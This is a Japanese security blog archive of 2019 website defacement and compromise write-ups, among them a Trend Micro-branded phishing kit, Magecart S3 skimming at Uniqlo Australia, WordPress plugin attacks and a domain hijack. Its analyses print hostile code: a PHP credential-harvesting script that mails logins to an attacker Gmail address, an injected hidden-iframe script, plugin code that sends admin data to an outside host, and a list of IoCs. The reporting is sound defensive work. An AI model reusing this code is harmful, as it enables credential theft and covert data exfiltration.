「Web改ざん」カテゴリーアーカイブ

トレンドマイクロを騙るフィッシング詐欺サイトについて調べてみた

トレンドマイクロのライセンス情報の登録などを行うポータルを騙ったフィッシング詐欺サイトが発見されたとTwitterで投稿がありました。ボリビアの企業サイトが改ざんされ、詐欺サイトが設置されているように見受けられます。ここではこのフィッシング詐欺サイトを調べた情報をまとめます。

トレンドマイクロのユーザー狙い?

f:id:piyokango:20191210060554p:plain
Customer Licensing Portalにそっくりな画面

  • ID(メールアドレス)、パスワードの窃取を目的としたもの。氏名、住所やクレジットカード情報を入力する画面は確認されず。
  • 「Sign In」クリック後は正規のトレンドマイクロ社のポータルサイトtm.login.trendmicro.comに遷移する。フィッシング詐欺サイトは入力チェックもしていないので、何も入力せずクリックしても正規サイトへ飛ばされる。
  • 表記は英語のみ。正規サイトは日本語圏から接続すると日本語表示となる。
  • Twitterでの報告を確認したもので、このサイトへ誘導するメール等はpiyokangoは確認していない。

同ディレクトリにZIPファイル

f:id:piyokango:20191210061115p:plain
ZIPファイルを確認

  • フィッシング詐欺サイトが設置されたサーバーはディレクトリリスティングが可能な状態だった。
  • 詐欺サイトが設置されたディレクトリのリスト中に「trendmicro.zip」というZIPファイルも存在。
  • ZIPファイルの中身は今回設置されていたトレンドマイクロのフィッシング詐欺のキットとみられる複数のファイルが内包されていた。
  • 表記された日付からフィッシング詐欺サイトも2019年12月9日に設置されたものとみられる。
ZIPファイルの中身

ZIPファイルの中身は以下の通り。HTML、PHP、JS、画像ファイルより構成。

11chl9h0dh4r03207qtn02jtal.js
1gnqei9vzyqfsctmvmuo5cjak.html
1jkxoqpv5dmupdmpkzc88ep2k.html
1xhj00viv3sva3v48xd92mko3b.html
21exo0es9ladq1tsnxooq4uwsw.png
267qlbmayc34p19fuvhe4g8qt9.js
2bbi2mfvcc4ig2v9vdnps4sfsc.js
2tojra4fztxc63ef10u0o87fn9.gif
2zoenq7wgq71022lc0blseyick.gif
3oizs390zzaun166vf0a7k1cbb.png
4o6g0hav1mjp1j4axk0huy6x8.png
biz.php
index.html
screenshot.png
screenshot_thumb.png
screenshot_thumb@2x.png
static.html

入力後にメール送信するPHP

  • 「biz.php」はGmailアドレスfegrapuoltry3@gmail.comに対し、入力されたメールアドレス、パスワードを送信。その後トレンドマイクロの正規サイトへリダイレクトさせるもの。
  • Created BY GPAという表記が見受けられる。
$ip = getenv("REMOTE_ADDR");
$message .= "--------------New Login--------\n";
$message .= "Email-ID : ".$_POST['username']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "Client IP : ".$ip."\n";
$message .= "---------------Created BY GPA-----------\n";
$send = "fegrapuoltry3@gmail.com";
$subject = "--New Log $ip -- Source:(trendmicro.com)";

mail($send,$subject,$message,$headers);

$redirect = "https://tm.login.trendmicro.com/authenticate/api/true?retryURL=https%3A%2F%2Ftm.login.trendmicro.com%2Fsimplesaml%2Fmodule.php%2Fcore%2Floginuserpass.php";

header("Location: " . $redirect);

関連情報

  • フィッシングURL innovabolivia[.]com/css/trendmicro/static.php
  • ZIPファイル 417eac5a5a00480fd58dd2e66646241a4fbbbdb17d0e7755b4ffdb86a15429b5

更新履歴

  • 2019年12月10日 AM 新規作成

ジョージア国内1万5千サイトの一斉改ざんについてまとめてみた

2019年10月28日、ジョージアで政府や裁判所など多数のWebサイトが改ざんされるなどの被害が出たと報じられました。また同時期に同国内のテレビ局でもシステム障害が発生しました。ここでは関連する情報をまとめます。

元大統領の写真を使った改ざん

f:id:piyokango:20191030081621p:plain
改ざんサイトで表示された画像

  • 政府当局が確認した改ざん被害は約2000サイト。その後原因となったホスティング事業者からは1万5000のサイトが影響を受けたと発表された。(現在そのリリース文は更新されていて数は確認できず)
  • 大量の改ざん被害は2019年10月28日午後に発生したと大統領報道官が述べている。
  • 改ざん後のサイトでは2013年まで大統領でその後ウクライナに亡命したMikheil Saakashvili氏の写真が表示。「 I'LL BE BACK」というメッセージもつけられていた。
  • Gov.geドメインで公開されている大統領府や裁判所、ニュースサイト、市議会等、様々な公的なサイトも影響を受けた。

f:id:piyokango:20191030180319p:plain
政府系のgov.geドメインのサイトも多数が影響を受けたとみられる

2つのテレビ局で同時発生した障害

  • ジョージアのテレビ局「TV Imedi」「TV Maestro」でも同時期にシステム障害が発生。
  • TV Imedi関係者が障害の様子をFacebookに投稿。サイバー攻撃に起因するものと説明。
  • その後現地時間で28日17時までには復旧されると投稿していた。
  • TV Maestroでも当時の様子を動画で公開している。砂嵐状態のテレビが設置されたスタジオの様子などが映されていた。

www.facebook.com

  • ZDnetではTV Pirveliも影響を受けたのではないかと報じている。

ホスティング事業者に不正アクセス

  • 一斉改ざんはジョージアのホスティング事業者「PRO Service」が不正アクセスを受けたことが原因。
  • 攻撃の標的は州政府、民間企業、メディア等のWebサイトを管理するサーバー。結果的に1万5000のサイトに影響が及ぶこととなった。
  • PRO Serviceは10月28日明け方にサイバー攻撃を受けたと説明している。
  • 10月28日20時頃までに影響を受けたサイトの約半数を復旧。29日15時までに復旧を終えたと発表。

f:id:piyokango:20191030171957p:plain
PRO Serviceの10月29日の発表文

  • 攻撃元に関する推測はメディア先行で行われているが、不正アクセスの帰属や手法に関する説明は掲載されていない。
  • PRO Serviceは内務省のサイバーセキュリティ部門、データ交換局、主要な業界関係者と連携。
  • 根本的な原因は特定されたと説明。後日その顛末を説明するとしている。

タイムラインの整理

  • 関連するタイムラインを整理すると以下の通り。
日時 出来事
2019年10月28日早朝 PRO Serviceのホスティングサービスに不正アクセス。
同日午後 ジョージア国内の大量のサイトが改ざんされる事象が発生。
同日午後 ジョージアのテレビ局2つでシステム障害が発生。
同日午後 ジョージア政府がサイバー攻撃の調査を開始したと報じられる。
同日17時頃 TV Imediのシステム障害が回復したとみられる。(関係者がSNSへ投稿)
同日20時 PRO Serviceが影響を受けたシステムの半数が復旧したと発表。
2019年10月29日 15時 PRO Serviceが影響を受けたシステム全数が復旧したと発表。

改ざんサイトにGIF画像埋込

  • 改ざん発生当時のコードは以下のもの。(キャッシュより)

f:id:piyokango:20191030082711p:plain
キャッシュに残っていた改ざん当時のHTMLコード

  • HTMLのコード中にGIF画像brother.lviv.ua/content/dot.gifが埋め込まれているがこれが何かは確認ができず。30日時点でこのGIF画像の設置はされておらず、これが元々削除されていたのか、この件を受けて対応されたのかは不明。
  • GIFとは異なり元大統領の画像1.jpegはPRO Serviceの改ざんされたサーバー自体に設置されたファイルが表示されていた。

更新履歴

  • 2019年10月30日 PM 新規作成
  • 2019年10月31日 PM 国名が正しくなかったため、ジョージアに表記を修正。

パンダくろしお運行スケジュールサイトの改ざんについてまとめてみた

2019年9月3日、JR西日本は不審なサイトへ誘導されるようWebサイトの改ざんが行われたとして被害を発表しました。

JR西日本の発表

f:id:piyokango:20190904063917p:plain
現在接続すると表示されるメンテナンスページ
www.westjr.co.jp

  • 改ざん被害を受けたのはパンダくろしお運行スケジュールwww.pandakuroshio.jpのWebサイト。
  • 臨時特急「パンダくろしお」の運行スケジュールを掲載するサイト。
  • 改ざん原因は調査中。
  • JR西日本のサイトなど他サイトでは被害は確認されていない。
日時 出来事
2019年9月1日16時頃 JR西日本社員が当該サイトの不審な挙動を発見。
2019年9月2日17時 当該サイトを閉鎖し、メンテナンス表示に切り替え。
2019年9月3日12時半頃 サイト管理会社へ調査を依頼し、レンタルサーバーでWebサイトが改ざんされた事実を確認。
同日 JR西日本が改ざん被害を発表。

確認された事象

  • 当該サイト接続時にアンケートの回答を求める不審なサイトへ誘導されるケースがあった。*1
  • アンケートの回答を進めるとクレジットカード情報の入力画面が表示された。*2
  • 当該サイトでは個人情報を保有していないが、不審なサイトのアンケートに回答をした場合に流出する恐れがあった。

更新履歴

  • 2019年9月4日 AM 新規作成

*1:JR西の運行ダイヤHPで不正改ざん…個人情報流出の恐れ,読売新聞,2019年9月4日

*2:piyokangoは改ざん痕跡を確認できなかったが、「ビジターアンケート」の類ではないかとみられる。rocketnews24.com

脆弱なAWS S3侵害によるユニクロオーストラリアの入力フォーム改ざんについてまとめてみた

Netcraftは、2019年5月13日頃にユニクロのオーストラリア向けオンラインショップが改ざんされ、画面上で入力する様々な情報が外部へ流出する可能性があったと報告しました。データの送信先や改ざんの手口から、RiskIQなども発表していたmagecartによる攻撃を受けたとみられます。
その後レポートは更新され、ファーストリテイリングより提供を受けた情報を元に、実際にはカード情報を含む顧客データが盗まれた可能性は低いと訂正されました。ここでは関連する情報をまとめます。

ユニクロオーストラリアの侵害

  • 2019年8月29日、Netcraftが調査レポートを公開した。

news.netcraft.com

  • Netcraftが事態を認知したのは2019年5月18日。
  • オンラインショップ利用者の情報が影響を受ける可能性があった。
  • 発表当初はカード情報が必ず窃取される報告だったが、その後その可能性は低いとして訂正されている。
  • 原因は入力フォームの情報を読み取ろうとする難読化されたスクリプトが挿入されていたため。
  • すべてのリソースに難読化されたコードを埋め込まれていたとされる。
  • 当該サイトはAWSのCloudfrontより配信されるファイルを読み込んでおり、S3 bucketsに格納されたデータが改ざんされたとみられる。
  • S3のACLの設定が誤っており、全てのユーザーがBuckets内のファイルを変更できた。
  • Netcraftの調査では他にguardianやhuffpostも影響を受けていたとみられる。ただし、スキミングコードはscriptタグに挿入されることを想定された実装であり、2つのサイトではiframeタグに挿入されたためコードが表示されたのみで動作はしなかった。
  • 同サイト上ではこの侵害に関する公式の報告は確認できず。(piyokango調べ)

Netcraftのレポートに事実誤認

  • 9月2日、5日にNetcraftのレポートが更新された。
  • ファーストリテイリングの調査に基づき、顧客情報が外部へ流出した可能性は低い(unlikely)と訂正された。

f:id:piyokango:20190906022529p:plain
Netcraftとファーストリテイリングの間で行われたやり取り

2社の調査内容、見解を整理すると以下の通り。

Netcraftが把握した事実 FRの調査・見解
購入フォームにスキミングコードが挿入、および実行された カード入力フォームはiframe内に存在し、スキミングコードの収集対象には含まれない
カード入力フォーム以外にカード番号を入力した場合*1、カード情報が外部へ流出する恐れ 過去数年の購入履歴を確認し、窃取のトリガーとなる他入力欄へのカード番号入力記録は確認されなかった

f:id:piyokango:20190906021825p:plain
カード入力フォームはiframe内に存在

改ざんの手口

f:id:piyokango:20190906023337p:plain
脆弱なS3侵害を通じたフォーム改ざんの流れ
Netcraft等の調査により、ユニクロオーストラリアの侵害は次の手口により行われたとみられる。

  1. 第三者が自由に変更できるAWS S3 bucketsを探査
  2. 手当たり次第にスキミングコードを含むスクリプトを追加
  3. 運よく入力フォームに影響を及ぼすスクリプトの挿入に成功
  4. 購入者が特定のフォーム上でカード番号を入力すると様々な情報が送信される恐れ

magecartによる手口

  • RiskIQが誤って設定されたAWS S3 Bucketsを介して大量のWebサイトが侵害されていると報告
  • 同社の調査では2019年4月初旬頃から少なくともこの手口による侵害が始まっていた。
  • 侵害対象数はドメイン数だけで見ると17,000件以上、Alexaランキング上位2000のサイトも含まれていた。
  • スキミングコードは大量の拡散には成功したものの、実際には支払いページで読み込まれる事例は多くなく、そのやり口からShotgun Approachと同社に表現されている。
  • VISAは2019年8月のレポートでこれらの事例を取り上げ、対策のベストプラクティスなども記載している。
  • magecartはカードスキミングを行う少なくとも7つのサイバー犯罪のグループ。今回の手口はGroup 7によるものとみられている。

日本国内の被害事例

同手口により改ざんされた(攻撃に失敗し、スキミングコードが露呈した)とみられる事例が報告されている。

IoC

不正なスクリプトの接続先の一覧としてNetcraft、RiskIQの記事に書かれていたものは以下の通り。

ww1-filecloud[.]com(2019年1月30日登録)
font-assets[.]com(2019年4月22日登録)
cdn-c[.]com(2019年5月13日登録)
cdn-imgcloud[.]com(2019年5月16日登録)
wix-cloud[.]com(2019年5月17日登録)
js-cloudhost[.]com (2019年5月17日登録)

更新履歴

*1:厳密にはカード番号に合致する正規表現に一致する場合

東濃鉄道 バス運行情報の虚偽投稿についてまとめてみた

東濃鉄道の運行情報ページが改ざんされ、虚偽の情報が掲示されていました。ここでは関連する情報をまとめます。

虚偽情報が掲示された運行情報

f:id:piyokango:20190510054003p:plain

  • 投稿されていたのは東農鉄道の路線・高速バス運行情報ページ。
  • ストライキによる運航停止として虚偽の情報が掲載されていた。
  • 2019年5月6日10時頃に利用者から問い合わせを受け1時間後投稿が削除。*1
  • 掲示用に用いられていたプログラムはKentWebのSunbbsとみられる。

f:id:piyokango:20190510055142p:plain

虚偽投稿内にJavaScript

  • 虚偽情報投稿にJavaScriptが仕込まれていたことを指摘する投稿がある。
  • ページを見た人が意図せず管理用ページにアクセスしてしまった可能性がある。
  • 他に別サイトへ連続アクセスする実装が行われていたとの情報がある。(piyokango未確認)
  • 以下仕込まれていたとみられるJavaScript(一部伏字)
var ckb = document;
createElement('iframe');
ckb.src = 'https' + '://www.tohtetsu.co.jp/cgi-bin/sunbbs.cgi?mode=form&pass=********';
ckb.style.position = 'absolute';
ckb.style.border = '0';
ckb.style.height = '1px';
ckb.style.width = '1px';
ckb.style.left = '1px';
ckb.style.top = '1px';
if (!document.getElementById('ckb')) {
  document.write('<div id=\'ckb\'></div>');
  document.getElementById('ckb').appendChild(ckb);
}

更新履歴

  • 2019年5月10日 AM 新規作成

TVerの改ざんについてまとめてみた

2019年4月29日、動画配信サービスのTVerはWebサイト、アプリから参照される画像などが改ざんされたと発表しました。ここでは関連する情報をまとめます。

公式リリース


tver.jp

被害の状況

f:id:piyokango:20190430010119p:plain
不正アクセスされたとみられるコンテンツ管理システム(アーカイブより、現在アクセス不可)

  • TVerのコンテンツ管理システムが外部から不正アクセスを受けた。
  • 何者かにより新規投稿や複数の番組画像の一部や番組説明、タイトルが改ざんされた。

f:id:piyokango:20190430011032p:plain

  • コンテンツが改ざんされた期間は2019年4月29日0時~3時半頃。
  • アップロードされていた画像には違法なものも含まれていたとみられる。
  • マルウェア感染などコンテンツ閲覧者への直接的な影響はない。
  • TVer上で行われていたアンケート情報の漏洩は確認されていない。

原因

f:id:piyokango:20190430095102p:plain

  • コンテンツ管理システムのアカウント情報(ID、パスワード)が外部から参照可能であったため。*1
  • データが参照可能となっていた経緯(サーバーの設定変更の詳細)は不明。

f:id:piyokango:20190430005511j:plain

  • パスワードは平文で保存されていた可能性がある。
  • 画像設置の行為は改ざんされる1日前から行われていた模様。

f:id:piyokango:20190430010015p:plain
f:id:piyokango:20190430095120j:plain

更新履歴

  • 2019年4月30日 AM 新規作成
  • 2019年4月30日 AM 画像を修正(補足書きなど追記)

WordPressプラグインを狙う攻撃が活発化している件をまとめてみた

「Yuzo Related Posts」など人気のWordPressプラグインを狙った攻撃活動が観測されているとしてセキュリティベンダが注意を呼び掛けており、また国内でも関連が疑われる被害報告が上がっています。ここでは関連する情報をまとめます。

3月以降脆弱性が確認されたプラグイン

2019年3月以降、脆弱性の悪用が報告されたプラグインは次のもの。

No 報告日 対象のプラグイン インストール数 バージョン 脆弱性
1 2019/03/15 Easy WP SMTP 40万件超 1.3.9以前 管理者への特権昇格
2 2019/03/21 Social Warfare 6万件超 3.5.2以前 XSS(格納型)、任意コードの実行
3 2019/03/30 Yuzo Related Posts 6万件超 5.12.91以前 XSS(格納型)
4 2019/04/09 Visual CSS Style Editor 3万件超 7.1.9以前 管理者への特権昇格
  • 全て脆弱性検証コード公開と攻撃活動観測あり。
  • 報告に上がっているのは詐欺サイトへの誘導。以下はセキュリティ企業が報告しているもの。
setforspecialdomain[.]com
somelandingpage[.]com
getmyfreetraffic[.]com
hellofromhony[.]org
pastebin.com/raw/0yJzqbYf
pastebin.com/raw/PcfntxEs
185.212.131.45
185.212.128.22
185.212.131.46
86.109.170.200
176.123.9.52
  • Defiantは脆弱性を悪用する活動は同一のグループによるものと推定。
  • Yuzo Related PostsとYellow PencilはWordpress.orgで4/16時点で非公開状態。
  • Wordpress.orgで非公開化されたものはセキュリティ上の問題が生じている可能性あり。

f:id:piyokango:20190417164643p:plain
公開停止中のYuzo Related Posts

国内での被害報告



  • Sucuriによれば、プラグインが利用されているかスキャン活動も観測されている模様。
  • プラグインに内包されるJavaScriptファイルなどを探査する。
  • 以下はYuzo Related Postsを対象としたもの。
https://[WordPress Site]/wp-content/plugins/yuzo-related-post/assets/js/admin.js

f:id:piyokango:20190417131609p:plain
JPドメインでも確認した例

以下はプラグイン別に概要をまとめたもの。

(1)Easy WP SMTP

脆弱性の概要
  • インポート、エクスポートの機能のアクセス制御に不備。
  • 細工したファイルをアップロードし、認証無しにWordPressの設定を変更できる。
  • 観測された攻撃は既定のロールを管理者にし、ユーザー登録機能を有効にするもの。

(2)Social Warface

脆弱性の概要
  • プラグイン呼び出しの際、読込先のファイル(JSON)のURLを指定できる。
  • 一部のパラメーターにエスケープ漏れがあり、XSSの脆弱性が存在する。
  • 観測された攻撃例ではPastebinが利用されていた。

(3)Yuzo Related Posts

脆弱性の概要
  • プラグインから呼び出される特定のパラメーターにエスケープ漏れが存在する。
  • 送信されたデータはデータベースから消さない限り、永続的に残るもの。
  • 脆弱性はyuzo-related-postが含まれるURL。
  • このプラグインは日本語記事でも紹介されている。
対策・復旧方法

wordpress.org
開発者が推奨する対策は以下の通り。

  • 一刻も早いプラグインの削除、アンインストール
  • wp_optionsテーブルにあるyuzo_related_post_optionsのレコード削除
  • wp_yuzoviewsはこの問題に影響しないため、削除しないように注意。
  • 改良バージョンは近々公開されると開発者は予告。
  • 開発者は他のプラグインへの影響はないと説明している。

f:id:piyokango:20190417131549p:plain

(4)Visual CSS Style Editor (Yellow Pencil)

脆弱性 検証コード
  • 特定のパラメーターが指定されると管理者特権でWordPressを操作できる。
  • これを利用してプラグイン呼び出しの際にWordPressの任意のオプションを指定が可能。
  • 任意のユーザー登録を可能とするオプションを有効化することができる。

(参考)一部プラグインは有効化時情報送信

脆弱性と別話題だがプラグイン有効化の際に情報を送信している行為が確認されたとの指摘がある。
technote.space

  • プラグインが改ざんされたのではなく、この元々備わっていたもの。
  • Yuzo Related Postsでは以下箇所で管理者メールアドレス、サーバーIPに関連する情報(緯度経度等)を送信していた。
$r = get_userdata(1);$n = $r->data->display_name;$e = get_option( 'admin_email' );echo "<script>jQuery.ajax({url: 'http://ilentheme.com/realactivate.php?em=$e&na=$n&la=".$IF_MyGEO->latitude."&lo=".$IF_MyGEO->longitude."&pais_code=".$IF_MyGEO->countryCode."&pais=".$IF_MyGEO->countryName."&region=".$IF_MyGEO->region."&ciudad=".$IF_MyGEO->city."&ip=".$IF_MyGEO->ip."&code=$code&type=$type',success: function (html) { null; } });</script>";

http://ilentheme.com/realactivate.php

  • また他関連表示プラグイン「WordPress Related Posts」でも情報送信を行っていると指摘している。

technote.space

(参考)脆弱性対応をめぐり衝突が起きていた

f:id:piyokango:20190417164236p:plain

更新履歴

  • 2019年4月17日 AM 新規作成

ラブライブ!公式サイトの改ざんについてまとめてみた

2019年4月5日早朝、ラブライブ!の公式サイトで改ざん被害が発生したと運営元アカウントが明らかにしました。ここでは関連する情報をまとめます。

公式のアナウンス

  • 安全性が確認されるまでは暫定的に設置したサイトを閲覧するよう案内。

www.sunrise-inc.co.jp

f:id:piyokango:20190406061542p:plain
発生直後に掲載されていた案内(現在は削除済)

サンライズ社サイト

www.sunrise-inc.co.jp

公式Twitter






公式サイトの状況

  • 2019年4月5日 2時頃から「ラブライブは我々が頂いた!」として次の画面が表示されていた。

f:id:piyokango:20190405060652p:plain

  • その後もページの一部箇所が変更。(直接確認できていないが他パターンもある模様)

f:id:piyokango:20190405091048p:plain
f:id:piyokango:20190405114213p:plain

  • 検索サイトからも次のように表示されていた。*1

f:id:piyokango:20190405060641p:plain

問題が生じた手口は調査中

f:id:piyokango:20190406060656p:plain

  • ラブライブ!のドメインが第三者にのっとられたために問題が発生した可能性がある。
  • ドメインのっとりについてサンライズは事実確認含め原因調査中。
  • 接続先が変更された第三者のページでは移管申請を行い保有者が承認しただけと説明。
  • サンライズはドメインロックなど安全対策は実施済みであったと取材に回答。*2

piyolog.hatenadiary.jp

表示されるページの状況

4/5 6時時点に確認

  • 音楽再生を行うタグが書かれていたがマルウェア感染など実脅威となる仕掛けは確認できず。

f:id:piyokango:20190405064003p:plain

  • GENERATORには「Namo WebEditor」の記述。

f:id:piyokango:20190405063946p:plain

  • METAタグを用いて60秒後に別サイト(艦隊これくしょん)のサイトへ遷移。

f:id:piyokango:20190405064055p:plain

  • FONTタグの一部文字が化けていた。

f:id:piyokango:20190405063938p:plain

4/5 12時時点に確認

  • IPアドレスが「157[.]112[.]187[.]13」から「157[.]112[.]186[.]245」へ変更。

4/5 15時半時点に確認

  • ドメイン情報が更新されサンライズ社に変更
  • 更新後に接続時にラブライブ!公式サイトのページが表示。

4/5 22時時点に確認

  • 安全性の確認の点検としてページが更新された。

f:id:piyokango:20190406062203p:plain

4/11 安全宣言後、元のドメインで再開

ドメイン情報の変化

f:id:piyokango:20190405060320p:plain

  • 履歴を確認するとIIJからXSEVERにIPアドレスが変更されていた。

f:id:piyokango:20190405060519p:plain
(更新日 2018年8月1日)
f:id:piyokango:20190405060548p:plain
(更新日 2019年4月5日)

  • 最終更新日は「2019/04/05 01:18:00 (JST)」となっている。
  • 同様にホストされているサンライズ社サイトは正常に表示される。
関与主張するSNSアカウントが存在
  • ドメイン情報に登録されたものと同じ名前のアカウントが存在。
  • 複数人から寄せられた質問へ答える形で行為の目的などを投稿。
  • 自身が管理しているとしてドメイン一覧の画像を投稿。

f:id:piyokango:20190406062630p:plain

  • 他複数のドメインでも同様のトラブルがあったとの報告があるが事実関係は確認されていない。*3
のっとり後に証明書が発行される
  • のっとられた後にlovelive-anime[.]jpドメインでTLS証明書の発行が行われた模様。



更新履歴

  • 2019年4月5日 AM 新規作成
  • 2019年4月5日 AM 続報反映
  • 2019年4月5日 AM 正規サイト表示となっていた箇所を削除
  • 2019年4月5日 PM 続報反映、改ざんと記載していた一部箇所を「のっとり」等に変更。
  • 2019年4月6日 AM 続報反映
  • 2019年4月13日 AM 続報反映

通販ページなどへ遷移するWebサイト改ざんについてまとめてみた

タイヤホイールや自転車などの通販ページに遷移させるWebサイトの改ざん事例が確認されています。ここでは関連する情報をまとめます。

確認した事象

piyokangoが確認した関連するとみられる被害は次のものです。
ただしこれらが同じ時期、同じ原因で行われたのかは確証を得ていません。

  • Webサイトが改ざんされ、通販ページなどへ遷移する。
  • 通販は自転車やタイヤホイール、カーテンなどを扱うもの。*1
  • 一部は偽警告ページが表示される場合がある。

公式発表では次の2件確認しています。

1.日本ノルディックフィットネス協会


www.facebook.com

検索すると次のキャッシュが残っていた。タイヤの通販(に見える)ページが表示されていた模様。
f:id:piyokango:20190303053203p:plain

f:id:piyokango:20190303053511p:plain

タイヤの名前で検索すると似たようなページが引っ掛かった。(1つ目は2月19日、2つ目は1月27日のキャッシュ)
f:id:piyokango:20190303053624p:plain

またJNFAの改ざん被害を受けたページ内にある「認知症予防のために~軽度認知障害(MCI)を早期発見する血液検査~」は次のページに含まれる文字列と一致したが、改ざんとの関連は不明。
mcbi.co.jp

キャッシュが残っていないため時期は不明だが、関係なさそうに見えるWebサイトも検索にかかった。(2件とも削除されている)
f:id:piyokango:20190303054147p:plain

f:id:piyokango:20190303054150p:plain

2.さっぽろ天神山アートスタジオ(札幌市)

www.city.sapporo.jp

「自転車買取.jp」と表示されたページへ遷移する2月28日のキャッシュが残っていた。
f:id:piyokango:20190303055153p:plain

同様に"自転車買取.jp"と埋め込まれたページが改ざんされたまま残っていた。
f:id:piyokango:20190303060558p:plain

アクセスしたところ次のJavaScriptのみが返された。

<script type='text/javascript'>setTimeout("window.location='http://<遷移するURL>/jump.aspx?jumpid=y3rate&f=<遷移先のページ>'",0000000000);</script>

確認した挙動は以下。

  • しばらく動かしているとYahoo!Japanのページに飛ばされるように挙動が変化した。(条件不明。。)
  • 検索サイトから飛んだ場合に別サイトへ飛ばされ、直接開くとそのサイトのページが表示される。

フィッシングサイトの設置も

  • 以下のURLにAmerican Expressのフィッシングサイトが設置されたとみられる痕跡が残っていた。(現在は既に削除されている)
https://tenjinyamastudio.jp/wordpress/wp-content/themes/amex/home2/home/


https://urlscan.io/screenshots/21dcf838-23d3-48e4-84f2-02219d45188b.png
urlscan.ioに残っていたスキャンログより)

更新履歴

  • 2019年3月3日 AM 新規作成
  • 2019年3月4日 AM さっぽろ天神山スタジオのフィッシングサイトについて追記